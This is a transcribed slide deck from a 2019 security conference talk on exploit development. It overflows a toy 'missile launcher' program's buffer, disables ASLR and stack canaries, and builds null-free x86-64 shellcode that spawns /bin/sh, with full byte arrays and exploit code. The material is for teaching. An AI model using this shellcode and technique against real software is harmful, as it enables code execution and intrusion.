Abstract image of a woman sitting on books and studying on a laptop

The Anatomy of an Exploit (NDC TechTown 2019)

Patricia Aas, profile picture
Patricia Aas

This document provides an overview of an exploit development process. It begins by discussing how exploits program the "weird machine" of vulnerable programs through memory manipulation. It then walks through developing a stack buffer overflow exploit against a vulnerable C program. Various compiler protections like stack canaries and ASLR are bypassed. The document generates a pattern to find the offset and writes an exploit program to automate writing an exploit string to trigger the vulnerability and redirect execution.

Software
Related topics:
Information Security
1 of 104
Download to read offline
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
Turtle Sec @pati_gallardo
The Anatomy of an Exploit NDC TechTown 2019 Patricia Aas Turtle Sec @pati_gallardo
Patricia Aas - Trainer & Consultant Turtle Sec C++ Programmer, Application Security Currently : TurtleSec Previously : Vivaldi, Cisco Systems, Knowit, Opera Software Master in Computer Science Pronouns: she/her @pati_gallardo
The Weird Machine @pati_gallardo
The Target The Exploit @pati_gallardo @halvarflake5 Weird State Weird State Programming the Weird Machine Vulnerability @sergeybratus
The Data is the Program and the Program is the Data Memory Loaders Heap Linkers Stack Memory Allocator @pati_gallardo 6
Exploit Development is Programming the Weird Machine 7 @pati_gallardo
Inherently Dangerous Function @pati_gallardo
printf("Secret: "); gets(response); @pati_gallardo 9
10 launch.c @pati_gallardovoid launch_missiles(int n) { printf("Launching %d missilesn", n); } void authenticate_and_launch(void) { int n_missiles = 2; bool allowaccess = false; char response[8]; printf("Secret: "); gets(response); if (strcmp(response, "Joshua") == 0) allowaccess = true; if (allowaccess) { puts("Access granted"); launch_missiles(n_missiles); } if (!allowaccess) puts("Access denied"); } int main(void) { puts("WarGames MissileLauncher v0.1"); authenticate_and_launch(); puts("Operation complete"); } @olvemaudal
11 $ hello$ clang -o launch launch.c launch.c:19:3: warning: implicit declaration of function 'gets' is invalid in C99 [-Wimplicit-function-declaration] gets(response); ^ 1 warning generated. /tmp/launch-0d1b0f.o: In function `authenticate_and_launch': launch.c:(.text+0x5e): warning: the `gets' function is dangerous and should not be used. CWE-242: Use of Inherently Dangerous Function @pati_gallardo
12 $ hello CMakeLists.txt # Wargames C # ------------------------- add_executable(launch src/launch.c) # Get gets set_property(TARGET launch PROPERTY C_STANDARD 99) # Allow gets target_compile_options(launch PRIVATE -Wno-deprecated-declarations) CMake: Getting gets @pati_gallardo
13 $ hello$ ./launch WarGames MissileLauncher v0.1 Secret: David Access denied Operation complete $ ./launch WarGames MissileLauncher v0.1 Secret: Joshua Access granted Launching 2 missiles Operation complete Happy Day Scenario @pati_gallardo
14 $ hello$ ./launch WarGames MissileLauncher v0.1 Secret: globalthermonuclearwar *** buffer overflow detected ***: ./launch terminated Aborted (core dumped) Unhappy Day Scenario @pati_gallardo Unstable Weird State
Fortify Protection @pati_gallardo
16 $ hello CMakeLists.txt # Remove Fortify protection in libc # *** buffer overflow detected ***: ./launch terminated # Aborted (core dumped) target_compile_options(launch PRIVATE -D_FORTIFY_SOURCE=0) CMake : Remove fortify protection from libc @pati_gallardo
17 $ hello$ ./launch WarGames MissileLauncher v0.1 Secret: globalthermonuclearwar Access denied *** stack smashing detected ***: <unknown> terminated Aborted (core dumped) CMake : Remove fortify protection from libc @pati_gallardo
Stack Canaries @pati_gallardo
Stack Canary 100 Return address 99 Stack Canary 98 char array item 3 97 char array item 2 96 char array item 1 95 char array item 0 Stack grows toward lower addresses Writes go toward higher addresses ptr++ 19 @pati_gallardo
20 $ hello CMakeLists.txt # remove the stack protector # *** stack smashing detected ***: <unknown> terminated # Aborted (core dumped) target_compile_options(launch PRIVATE -fno-stack-protector) CMake: Turn off stack protector @pati_gallardo
21 $ hello$ ./launch WarGames MissileLauncher v0.1 Secret: globalthermonuclearwar Access denied Segmentation fault (core dumped) CMake: Turn off stack protector What’s going on? Let’s check on godbolt @pati_gallardo
Debug: Local variables on the stack Release: Local variables optimized out @pati_gallardo
Let’s try the Debug build then! @pati_gallardo
24 $ hello$ ./launch WarGames MissileLauncher v0.1 Secret: globalthermonuclearwar Access granted Launching 1869443685 missiles Access denied Operation complete Debug Build Somebody’s bools are acting weird :D ✔ @pati_gallardo
Prefer C++ to C, right? @pati_gallardo
26 $ hello CMakeLists.txt # Wargames C++ # ------------------------- add_executable(launch_cpp src/launch.cpp) Start from scratch with C++ @pati_gallardo
27 launch.cpp @pati_gallardovoid launch_missiles(int n) { printf("Launching %d missilesn", n); } void authenticate_and_launch() { int n_missiles = 2; bool allowaccess = false; char response[8]; printf("Secret: "); std::cin >> response; if (strcmp(response, "Joshua") == 0) allowaccess = true; if (allowaccess) { puts("Access granted"); launch_missiles(n_missiles); } if (!allowaccess) puts("Access denied"); } int main() { puts("WarGames MissileLauncher v0.1"); authenticate_and_launch(); puts("Operation complete"); } Much better, right?
28 $ hello$ clang++ -o launch_cpp launch.cpp $ Not even a warning! @pati_gallardo Must be better, right?
29 $ hello$ ./launch_cpp WarGames MissileLauncher v0.1 Secret: David Access denied Operation complete $ ./launch_cpp WarGames MissileLauncher v0.1 Secret: Joshua Access granted Launching 2 missiles Operation complete Happy Day Scenario @pati_gallardo
30 $ hello$ clang++ -O3 -o launch_cpp launch.cpp $ ./launch_cpp WarGames MissileLauncher v0.1 Secret: globalthermonuclearwar Access denied Operation complete Segmentation fault (core dumped) Let’s test the release build @pati_gallardo
31 $ hello$ clang++ -O0 -o launch_cpp launch.cpp $ ./launch_cpp WarGames MissileLauncher v0.1 Secret: globalthermonuclearwar Access granted Launching 1852796274 missiles Segmentation fault (core dumped) Ok, debug then... Both n_missiles and allowaccess overwritten ✔ @pati_gallardo Ops...
Controlling stack variables @pati_gallardo
int n_missiles = 2; bool allowaccess = false; @pati_gallardo 33
34 launch.cpp @pati_gallardovoid authenticate_and_launch() { int n_missiles = 2; bool allowaccess = false; char response[8]; printf("Secret: "); std::cin >> response; if (strcmp(response, "Joshua") == 0) allowaccess = true; if (allowaccess) { puts("Access granted"); launch_missiles(n_missiles); } if (!allowaccess) puts("Access denied"); }
35 $ hello$ clang++ -O0 -o launch_cpp launch.cpp $ ./launch_cpp WarGames MissileLauncher v0.1 Secret: AAAABBBBC* Access granted Launching 42 missiles Operation complete $ Lets try a shorter string n_missiles -> 42 -> 0x2a -> ‘*’ ✔ @pati_gallardo
36 $ hello$ clang++ -O0 -o launch_cpp launch.cpp $ ./launch_cpp WarGames MissileLauncher v0.1 Secret: AAAABBBBCd Access granted Launching 100 missiles Operation complete Lets try a shorter string n_missiles -> 100 -> 0x64 -> ‘d’ ✔ @pati_gallardo
37 $ hello$ ./launch_cpp WarGames MissileLauncher v0.1 Secret: AAAABBBB0d Access denied Operation complete $ ./launch_cpp WarGames MissileLauncher v0.1 Secret: AAAABBBB1d Access granted Launching 100 missiles Operation complete Controlling allowaccess Controlling allowaccess ✔ @pati_gallardo
Automate, automate! @pati_gallardo@pati_gallardo
@pati_gallardo 39 $ hello simple_exploit.c int main(void) { struct { uint8_t buffer[8]; bool allowaccess; char n_missiles; } sf; memset(&sf, 0, sizeof sf); sf.allowaccess = true; sf.n_missiles = 42; fwrite(&sf, sizeof sf, 1, stdout); } Automate the string @pati_gallardo @olvemaudal
40 $ hello$ clang -o simple_exploit simple_exploit.c $ ./simple_exploit | ./launch WarGames MissileLauncher v0.1 Secret: Access granted Launching 42 missiles Operation complete $ ./simple_exploit | ./launch_cpp WarGames MissileLauncher v0.1 Secret: Access granted Launching 42 missiles Operation complete Let’s try it out! ✔ ✔ @pati_gallardo
Fixing the C++ code! @pati_gallardo
42 launch.cpp @pati_gallardovoid launch_missiles(int n) { printf("Launching %d missilesn", n); } void authenticate_and_launch(void) { int n_missiles = 2; bool allowaccess = false; char response[8]; printf("Secret: "); size_t max = sizeof response; std::cin >> std::setw(max) >> response; if (strcmp(response, "Joshua") == 0) allowaccess = true; if (allowaccess) { puts("Access granted"); launch_missiles(n_missiles); } if (!allowaccess) puts("Access denied"); } int main(void) { puts("WarGames MissileLauncher v0.1"); authenticate_and_launch(); puts("Operation complete"); } Set the width on cin
43 $ hello$ clang++ -o launch_fixed launch_fixed.cpp $ ./launch_fixed WarGames MissileLauncher v0.1 Secret: AAAABBBBC* Access denied Operation complete $ ./simple_exploit | ./launch_fixed WarGames MissileLauncher v0.1 Secret: Access denied Operation complete Let’s test it! @pati_gallardo
Use sed to binary patch @pati_gallardo
45 $ hello $ objdump -M intel -d ./launch | grep -A 7 "<_Z23authenticate_and_launchv>:" 0000000000400890 <_Z23authenticate_and_launchv>: 400890: 55 push rbp 400891: 48 89 e5 mov rbp,rsp 400894: 48 83 ec 30 sub rsp,0x30 400898: 48 bf 4b 0a 40 00 00 movabs rdi,0x400a4b 40089f: 00 00 00 4008a2: c7 45 fc 02 00 00 00 mov DWORD PTR [rbp-0x4],0x2 4008a9: c6 45 fb 00 mov BYTE PTR [rbp-0x5],0x0 Use sed to binary patch $ cp launch launch_mod $ sed -i "s/xc7x45xfcx02/xc7x45xfcx2a/" ./launch_mod $ sed -i "s/xc6x45xfbx00/xc6x45xfbx01/" ./launch_mod @pati_gallardo n_missiles = 2 allowaccess = false n_missiles = 42 and allowaccess = true
46 $ hello $ ./launch_mod WarGames MissileLauncher v0.1 Secret: David Access granted Launching 42 missiles Operation complete Use sed to binary patch ✔$ ./launch_mod WarGames MissileLauncher v0.1 Secret: Joshua Access granted Launching 42 missiles Operation complete $ ./launch_mod WarGames MissileLauncher v0.1 Secret: globalthermonuclearwar Access granted Launching 42 missiles Operation complete ✔ ✔ @pati_gallardo
Stack Buffer Exploit @pati_gallardo
Shellcode - code that gives you shell int execve(const char *filename, char *const argv[], char *const envp[]); Target Process Vulnerable Program Target Process /bin/sh Shellcode 48 @pati_gallardo
Write direction vs Stack growing direction 100 Return address 99 <something> 98 char array item 3 97 char array item 2 96 char array item 1 95 char array item 0 Stack grows toward lower addresses Writes go toward higher addresses ptr++ 49 @pati_gallardo
Stack grows toward lower addresses Writes go toward higher addresses ptr++ 50 Write direction vs Stack growing direction @pati_gallardo 100 char[5]: “ret” address 95 99 char[4]: No-op 98 char[3]: No-op 97 char[2]: No-op 96 char[1]: Shellcode 95 char[0]: Shellcode Write Payload
100 char[5]: “ret” address 95 99 char[4]: No-op 98 char[3]: No-op 97 char[2]: No-op 96 char[1]: Shellcode 95 char[0]: Shellcode Stack grows toward lower addresses Instructions also go toward higher addresses 51 Write direction vs Stack growing direction @pati_gallardo
52 stack_overflow_exploit.c @pati_gallardoint main(void) { char shellcode[] = ""; size_t shellcode_size = (sizeof shellcode) - 1; int offset = 0; // We need to find the return addr offset int padded_bytes = offset - shellcode_size; { fwrite(shellcode, 1, shellcode_size, stdout); } { char pad[] = "x90"; // No-ops for (int i = 0; i < padded_bytes; i++) fwrite(pad, 1, 1, stdout); } { // We need to find the address of the buffer char addr[] = ""; fwrite(addr, 1, 6, stdout); } putchar('0'); } Basic structure of the exploit code
53 stack_overflow_exploit.c @pati_gallardoint main(void) { char shellcode[] = ""; size_t shellcode_size = (sizeof shellcode) - 1; int offset = 0; // We need to find the return addr offset int padded_bytes = offset - shellcode_size; { fwrite(shellcode, 1, shellcode_size, stdout); } { char pad[] = "x90"; // No-ops for (int i = 0; i < padded_bytes; i++) fwrite(pad, 1, 1, stdout); } { // We need to find the address of the buffer char addr[] = ""; fwrite(addr, 1, 6, stdout); } putchar('0'); } What we need to know Offset of return address from buffer on the stack Address of buffer in memory
54 launch_bigger.cpp @pati_gallardovoid launch_missiles(int n) { printf("Launching %d missilesn", n); } void authenticate_and_launch(void) { int n_missiles = 2; bool allowaccess = false; char response[110]; printf("%pn", &response); printf("Secret: "); std::cin >> response; if (strcmp(response, "Joshua") == 0) allowaccess = true; if (allowaccess) { puts("Access granted"); launch_missiles(n_missiles); } if (!allowaccess) puts("Access denied"); } int main(void) { puts("WarGames MissileLauncher v0.1"); authenticate_and_launch(); puts("Operation complete"); } Lets make some changes to make it easier Bigger buffer and get the address
ASLR echo 0 > /proc/sys/kernel/randomize_va_space @pati_gallardo 55
Metasploit pattern_create and pattern_offset Used to find the offset of the return pointer from the start of the buffer Metasploit pattern_create Creates a string of un-repeated character sequences Metasploit pattern_offset Gives the offset in the character sequence of this section @pati_gallardo 56
57 @pati_gallardo$ pattern_create -l 150 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac 1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2A e3Ae4Ae5Ae6Ae7Ae8Ae9 $ clang++ -z execstack -fno-stack-protector -o launch_bigger launch_bigger.cpp $ gdb -q ./launch_bigger (gdb) br *authenticate_and_launch+205 Breakpoint 1 at 0x4008dd (gdb) r Starting program: ./launch_bigger WarGames MissileLauncher v0.1 0x7fffffffdc90 Secret: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac 1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2A e3Ae4Ae5Ae6Ae7Ae8Ae9 Access granted Launching 1698771301 missiles Breakpoint 1, 0x00000000004008dd in authenticate_and_launch() () (gdb) x/1xg $sp 0x7fffffffdd18: 0x3765413665413565 (gdb) q $ pattern_offset -q 3765413665413565 [*] Exact match at offset 136 Find the offset of the return address Offset of return address from buffer on the stack Address of buffer in memory
Stack Buffer Exploit @pati_gallardo Attempt 1
59 simple_stack_overflow_test.c @pati_gallardo#include <stdio.h> #include <string.h> char shellcode[] = "xebx17" // jmp <push_str> "x5f" // <pop_str>: pop %rdi "x48x31xd2" // xor %rdx,%rdx "x48x31xc0" // xor %rax,%rax "x48x89xe6" // mov %rsp,%rsi "x48x89x54x24x08" // mov %rdx,0x8(%rsp) "x48x89x3cx24" // mov %rdi,(%rsp) "xb0x3b" // mov $0x3b,%al "x0fx05" // syscall "xe8xe4xffxffxff" // <push_str>: callq <pop_str> "/bin/sh"; int main() { printf("len:%lu bytesn", strlen(shellcode)); (*(void(*)()) shellcode)(); return 0; } See talk at CppCon 2018 for details
60 $ hellowargames$ clang -z execstack -o simple_stack_overflow_test simple_stack_overflow_test.c wargames$ ./simple_stack_overflow_test len:37 bytes $ Let’s just test it @pati_gallardo ✔
61 $ hellowargames$ clang -o simple_stack_overflow_exploit simple_stack_overflow_exploit.c wargames$ ./simple_stack_overflow_exploit > file wargames$ gdb -q ./launch_bigger (gdb) r < file Starting program: ./launch_bigger < file WarGames MissileLauncher v0.1 0x7fffffffdc90 Secret: Access denied Let’s try it @pati_gallardo It just hangs: /bin/sh string not null terminated
Stack Buffer Exploit @pati_gallardo Attempt 2
63 $ hello simple_stack_overflow_test2.c char shellcode[] = "x48x31xd2" // xor %rdx,%rdx "x48x31xc0" // xor %rax,%rax "x50" // push %rax "x48xbbx2fx62x69x6ex2fx2fx73x68" // movabs $0x68732f2f6e69622f,%rbx "x53" // push %rbx "x48x89xe7" // mov %rsp,%rdi "x52" // push %rdx "x57" // push %rdi "x48x89xe6" // mov %rsp,%rsi "xb0x3b" // mov $0x3b,%al "x0fx05"; // syscall int main() { printf("len:%lu bytesn", strlen(shellcode)); (*(void(*)()) shellcode)(); return 0; } @pati_gallardo Null terminate the string in the shellcode Hex value Ascii Reverse Ascii 68732f2f6e69622f hs//nib/ /bin//sh
64 $ hellowargames$ clang -z execstack -fno-stack-protector -o simple_stack_overflow_test2 simple_stack_overflow_test2.c wargames$ ./simple_stack_overflow_test2 len:30 bytes $ Let’s just test it @pati_gallardo ✔
65 $ hellowargames$ clang -o simple_stack_overflow_exploit simple_stack_overflow_exploit.c wargames$ ./simple_stack_overflow_exploit > file wargames$ gdb -q ./launch_bigger (gdb) r < file Starting program: ./launch_bigger < file WarGames MissileLauncher v0.1 0x7fffffffdc90 Secret: Access denied process 21397 is executing new program: /bin/dash [Inferior 1 (process 21397) exited normally] (gdb) Let’s try it @pati_gallardo Starts /bin/bash but exits immediately ✔
66 $ hellowargames$ clang -o simple_stack_overflow_exploit2 simple_stack_overflow_exploit2.c wargames$ ./simple_stack_overflow_exploit2 > file wargames$ strace -o strace.log ./launch_bigger < file WarGames MissileLauncher v0.1 0x7fffffffdd10 Secret: Access denied wargames$ grep ENOTTY strace.log ioctl(0, TCGETS, 0x7fffffffeba0) = -1 ENOTTY (Inappropriate ioctl for device) What’s wrong? Lets look at strace @pati_gallardo The shell fails to start because of TTY? Google!
Stack Buffer Exploit @pati_gallardo Attempt 3
New Idea! Try to close STDIN and reopen tty first @pati_gallardo 68
Write C code for shellcode Compile it Put bytes in a char buffer Put jmp addr on ret addr Write inline assembly, eliminating zero bytes 69 @pati_gallardo
70 $ hello shellcode.c #include <unistd.h> #include <fcntl.h> int main(void) { close(0); open("/dev/tty", O_RDWR); char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } @pati_gallardo
Write C code for shellcode Compile it Put bytes in a char buffer Put jmp addr on ret addr Write inline assembly, eliminating zero bytes 71 @pati_gallardo
72 $ hellowargames$ clang -save-temps -Os -static -fno-stack-protector -o shellcode shellcode.c wargames$ ./shellcode $ wargames$ ldd shellcode not a dynamic executable Build it statically, with no canary @pati_gallardo
Write C code for shellcode Compile it Put bytes in a char buffer Put jmp addr on ret addr Write inline assembly, eliminating zero bytes 73 @pati_gallardo
74 $ hellowargames$ objdump -d shellcode | grep -A 14 "<main>" 0000000000400b30 <main>: 400b30: 48 83 ec 18 sub $0x18,%rsp 400b34: 31 ff xor %edi,%edi 400b36: e8 15 8b 04 00 callq 449650 <__close> 400b3b: bf 44 1f 49 00 mov $0x491f44,%edi 400b40: be 02 00 00 00 mov $0x2,%esi 400b45: 31 c0 xor %eax,%eax 400b47: e8 a4 85 04 00 callq 4490f0 <__libc_open> 400b4c: b8 4d 1f 49 00 mov $0x491f4d,%eax 400b51: 66 48 0f 6e c0 movq %rax,%xmm0 400b56: 48 89 e6 mov %rsp,%rsi 400b59: 66 0f 7f 06 movdqa %xmm0,(%rsi) 400b5d: bf 4d 1f 49 00 mov $0x491f4d,%edi 400b62: 31 d2 xor %edx,%edx 400b64: e8 47 7f 04 00 callq 448ab0 <__execve> Look at the assembly of main @pati_gallardo
75 %rax # System call %rdi %rsi %rdx %r10 0x3 3 sys_close unsigned int fd 0x3b 59 sys_execve const char * filename const char * const argv[] const char * const envp[] 0x101 257 sys_openat int dfd const char * filename int flags int mode The syscalls involved @pati_gallardo
76 $ hellowargames$ objdump -d shellcode | grep -A 6 "<__close>:" 0000000000449650 <__close>: 449650: 8b 05 b6 31 27 00 mov 0x2731b6(%rip),%eax 449656: 85 c0 test %eax,%eax 449658: 75 16 jne 449670 <__close+0x20> 44965a: b8 03 00 00 00 mov $0x3,%eax 44965f: 0f 05 syscall 449661: 48 3d 00 f0 ff ff cmp $0xfffffffffffff000,%rax %rax # System call %rdi 0x3 3 sys_close unsigned int fd @pati_gallardo
77 $ hello shellcode_asm.c // -------------------------------------------------------- // close // -------------------------------------------------------- "xor %rdi, %rdint" // Zero out rdi - without using 0 "xor %rax, %raxnt" // Zero out rax - without using 0 "mov $0x3, %alnt" // Write the syscall number (3) to al "syscallnt" // Do the syscall %rax # System call %rdi 0x3 3 sys_close unsigned int fd @pati_gallardo
78 $ hello wargames$ objdump -d shellcode | grep -A 30 "<__libc_open>:" 00000000004490f0 <__libc_open>: 4490f0: 48 83 ec 68 sub $0x68,%rsp 4490f4: 41 89 f2 mov %esi,%r10d 4490f7: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax 4490fe: 00 00 449100: 48 89 44 24 28 mov %rax,0x28(%rsp) 449105: 31 c0 xor %eax,%eax 449107: 41 83 e2 40 and $0x40,%r10d 44910b: 48 89 54 24 40 mov %rdx,0x40(%rsp) 449110: 75 4e jne 449160 <__libc_open+0x70> 449112: 89 f0 mov %esi,%eax 449114: 25 00 00 41 00 and $0x410000,%eax 449119: 3d 00 00 41 00 cmp $0x410000,%eax 44911e: 74 40 je 449160 <__libc_open+0x70> 449120: 8b 05 e6 36 27 00 mov 0x2736e6(%rip),%eax 449126: 85 c0 test %eax,%eax 449128: 75 61 jne 44918b <__libc_open+0x9b> 44912a: 89 f2 mov %esi,%edx 44912c: b8 01 01 00 00 mov $0x101,%eax 449131: 48 89 fe mov %rdi,%rsi 449134: bf 9c ff ff ff mov $0xffffff9c,%edi 449139: 0f 05 syscall %rax # System call %rdi %rsi %rdx %r10 0x101 257 sys_openat int dfd const char * filename int flags int mode @pati_gallardo
79 $ hello shellcode_asm.c // -------------------------------------------------------- // open // -------------------------------------------------------- "xor %rax, %raxnt" // Zero out rax - without using 0 "push %raxnt" // Push a string terminator "movabs $0x7974742f7665642f, %rbxnt" // Put the string in rbx: // /dev/tty = 2f 64 65 76 2f 74 74 79 "push %rbxnt" // Push rbx on the stack "mov %rsp, %rsint" // Put a pointer to the string in rsi "xor %rdx, %rdxnt" // Zero out rdx - without using 0 "xor %rdi, %rdint" // Zero out rdi - without using 0 "xor %r10, %r10nt" // Zero out r10 - without using 0 "mov $0x101, %eaxnt" // Write the syscall number (257) "syscallnt" // Do the syscall %rax # System call %rdi %rsi %rdx %r10 0x101 257 sys_openat int dfd const char * filename int flags int mode @pati_gallardo
80 $ hellowargames$ objdump -d shellcode | grep -A 3 "<__execve>:" 0000000000448ab0 <__execve>: 448ab0: b8 3b 00 00 00 mov $0x3b,%eax 448ab5: 0f 05 syscall 448ab7: 48 3d 01 f0 ff ff cmp $0xfffffffffffff001,%rax %rax # System call %rdi %rsi %rdx 0x3b 59 sys_execve const char * filename const char * const argv[] const char * const envp[] @pati_gallardo
81 $ hello shellcode_asm.c // -------------------------------------------------------- // execve // -------------------------------------------------------- "xor %rdx, %rdxnt" // Zero out rdx - without using 0 "xor %rax, %raxnt" // Zero out rax - without using 0 "push %raxnt" // Push a string terminator "movabs $0x68732f2f6e69622f, %rbxnt" // Put the string in rbx: // /bin//sh = 2f 62 69 6e 2f 2f 73 68 "push %rbxnt" // Push rbx on the stack "mov %rsp, %rdint" // Put a pointer to the string in rdi "push %rdxnt" // Push a null to terminate the array "push %rdint" // Push the pointer to the string "mov %rsp, %rsint" // Put a pointer to argv in rsi "mov $0x3b, %alnt" // Write the syscall number 59 to al "syscallnt" // Do the syscall %rax # System call %rdi %rsi %rdx 0x3b 59 sys_execve const char * filename const char * const argv[] const char * const envp[] @pati_gallardo
82 $ hellowargames$ clang -o shellcode_asm shellcode_asm.c wargames$ ./shellcode_asm $ Compile and test the assembly @pati_gallardo ✔
83 @pati_gallardowargames$ objdump -d shellcode_asm | grep -A 29 "<main>" 400480: 55 push %rbp 400481: 48 89 e5 mov %rsp,%rbp 400484: 48 31 ff xor %rdi,%rdi 400487: 48 31 c0 xor %rax,%rax 40048a: b0 03 mov $0x3,%al 40048c: 0f 05 syscall 40048e: 48 31 c0 xor %rax,%rax 400491: 50 push %rax 400492: 48 bb 2f 64 65 76 2f movabs $0x7974742f7665642f,%rbx 400499: 74 74 79 40049c: 53 push %rbx 40049d: 48 89 e6 mov %rsp,%rsi 4004a0: 48 31 d2 xor %rdx,%rdx 4004a3: 48 31 ff xor %rdi,%rdi 4004a6: 4d 31 d2 xor %r10,%r10 4004a9: b8 01 01 00 00 mov $0x101,%eax 4004ae: 0f 05 syscall 4004b0: 48 31 d2 xor %rdx,%rdx 4004b3: 48 31 c0 xor %rax,%rax 4004b6: 50 push %rax 4004b7: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx 4004be: 2f 73 68 4004c1: 53 push %rbx 4004c2: 48 89 e7 mov %rsp,%rdi 4004c5: 52 push %rdx 4004c6: 57 push %rdi 4004c7: 48 89 e6 mov %rsp,%rsi 4004ca: b0 3b mov $0x3b,%al 4004cc: 0f 05 syscall Look at the assembly of main Null bytes in the shellcode!
84 $ hello shellcode_asm.c // -------------------------------------------------------- // open // -------------------------------------------------------- "xor %rax, %raxnt" // Zero out rax - without using 0 "push %raxnt" // Push a string terminator "movabs $0x7974742f7665642f, %rbxnt" // Put the string in rbx: // /dev/tty = 2f 64 65 76 2f 74 74 79 "push %rbxnt" // Push rbx on the stack "mov %rsp, %rsint" // Put a pointer to the string in rsi "xor %rdx, %rdxnt" // Zero out rdx - without using 0 "xor %rdi, %rdint" // Zero out rdi - without using 0 "xor %r10, %r10nt" // Zero out r10 - without using 0 "mov $0x101, %eaxnt" // Write syscall number 257 to eax "syscallnt" // Do the syscall @pati_gallardo %rax # System call %rdi %rsi %rdx %r10 0x101 257 sys_openat int dfd const char * filename int flags int mode
85 $ hello shellcode_asm.c "mov $0xFF, %alnt" // Write syscall number 255 to al "inc %raxnt" "inc %raxnt" //"mov $0x101, %eaxnt" // Write syscall number 257 to eax %rax # System call %rdi %rsi %rdx %r10 0x101 257 sys_openat int dfd const char * filename int flags int mode @pati_gallardo Write 255 and inc it twice
86 @pati_gallardowargames$ objdump -d shellcode_asm | grep -A 31 "<main>" 0000000000400480 <main>: 400480: 55 push %rbp 400481: 48 89 e5 mov %rsp,%rbp 400484: 48 31 ff xor %rdi,%rdi 400487: 48 31 c0 xor %rax,%rax 40048a: b0 03 mov $0x3,%al 40048c: 0f 05 syscall 40048e: 48 31 c0 xor %rax,%rax 400491: 50 push %rax 400492: 48 bb 2f 64 65 76 2f movabs $0x7974742f7665642f,%rbx 400499: 74 74 79 40049c: 53 push %rbx 40049d: 48 89 e6 mov %rsp,%rsi 4004a0: 48 31 d2 xor %rdx,%rdx 4004a3: 48 31 ff xor %rdi,%rdi 4004a6: 4d 31 d2 xor %r10,%r10 4004a9: b0 ff mov $0xff,%al 4004ab: 48 ff c0 inc %rax 4004ae: 48 ff c0 inc %rax 4004b1: 0f 05 syscall 4004b3: 48 31 d2 xor %rdx,%rdx 4004b6: 48 31 c0 xor %rax,%rax 4004b9: 50 push %rax 4004ba: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx 4004c1: 2f 73 68 4004c4: 53 push %rbx 4004c5: 48 89 e7 mov %rsp,%rdi 4004c8: 52 push %rdx 4004c9: 57 push %rdi 4004ca: 48 89 e6 mov %rsp,%rsi 4004cd: b0 3b mov $0x3b,%al 4004cf: 0f 05 syscall Look at the assembly of main close open execve
Write C code for shellcode Compile it Put bytes in a char buffer Put jmp addr on ret addr Write inline assembly, eliminating zero bytes 87 @pati_gallardo
88 shellcode_test.c @pati_gallardochar shellcode[] = "x48x31xff" // xor %rdi,%rdi "x48x31xc0" // xor %rax,%rax "xb0x03" // mov $0x3,%al "x0fx05" // syscall "x48x31xc0" // xor %rax,%rax "x50" // push %rax "x48xbbx2fx64x65x76x2f" // movabs $0x7974742f7665642f,%rbx "x74x74x79" // "x53" // push %rbx "x48x89xe6" // mov %rsp,%rsi "x48x31xd2" // xor %rdx,%rdx "x48x31xff" // xor %rdi,%rdi "x4dx31xd2" // xor %r10,%r10 "xb0xff" // mov $0xff,%al "x48xffxc0" // inc %rax "x48xffxc0" // inc %rax "x0fx05" // syscall "x48x31xd2" // xor %rdx,%rdx "x48x31xc0" // xor %rax,%rax "x50" // push %rax "x48xbbx2fx62x69x6ex2f" // movabs $0x68732f2f6e69622f,%rbx "x2fx73x68" // "x53" // push %rbx "x48x89xe7" // mov %rsp,%rdi "x52" // push %rdx "x57" // push %rdi "x48x89xe6" // mov %rsp,%rsi "xb0x3b" // mov $0x3b,%al "x0fx05"; // syscall close open execve Let’s put the bytes in a char buffer
89 $ hello shellcode_close_test.c int main() { printf("len:%lu bytesn", strlen(shellcode)); (*(void(*)()) shellcode)(); return 0; } Let’s run the char buffer @pati_gallardo
90 $ hello$ clang -z execstack -o shellcode_test shellcode_test.c $ ./shellcode_test len:77 bytes $ Compile and test the assembly @pati_gallardo ✔
Write C code for shellcode Compile it Put bytes in a char buffer Put jmp addr on ret addr Write inline assembly, eliminating zero bytes 91 @pati_gallardo
92 $ hellowargames$ clang -o shellcode_exploit shellcode_exploit.c wargames$ ./shellcode_exploit > file wargames$ gdb -q ./launch_bigger (gdb) r < file Starting program: ./launch_bigger < file WarGames MissileLauncher v0.1 0x7fffffffdc90 Secret: Access denied process 29337 is executing new program: /bin/dash $ Use the exploit in gdb @pati_gallardo ✔
Turtle Sec @pati_gallardo WIN!
94 $ hellowargames$ ./shellcode_exploit | ./launch_bigger WarGames MissileLauncher v0.1 0x7fffffffdd10 Secret: Access denied $ Use the exploit with pipe @pati_gallardo ✔
Turtle Sec @pati_gallardo WIN! WIN!
Cheats - We turned off ASLR - We made the stack executable - We turned off stack canaries - We printed the address of the buffer @pati_gallardo 96
Examples of newer exploit techniques - Information Leaks - to defy ASLR - Return Oriented Programming - to defy non-executable stack @pati_gallardo 97
The Target The Exploit @pati_gallardo @halvarflake98 Weird State Weird State Programming the Weird Machine Vulnerability @sergeybratus
Programs need to be deterministically correct Exploits need to be probabilistically correct 99 @pati_gallardo
Exploit Development is Programming the Weird Machine 100 @pati_gallardo
Turtle Sec Questions? Inspired by the training (In)Security in C++, Secure Coding Practices in C++ Patricia Aas, TurtleSec @pati_gallardo
Turtle Sec Photos from pixabay.com Patricia Aas, TurtleSec @pati_gallardo
Turtle Sec @pati_gallardo
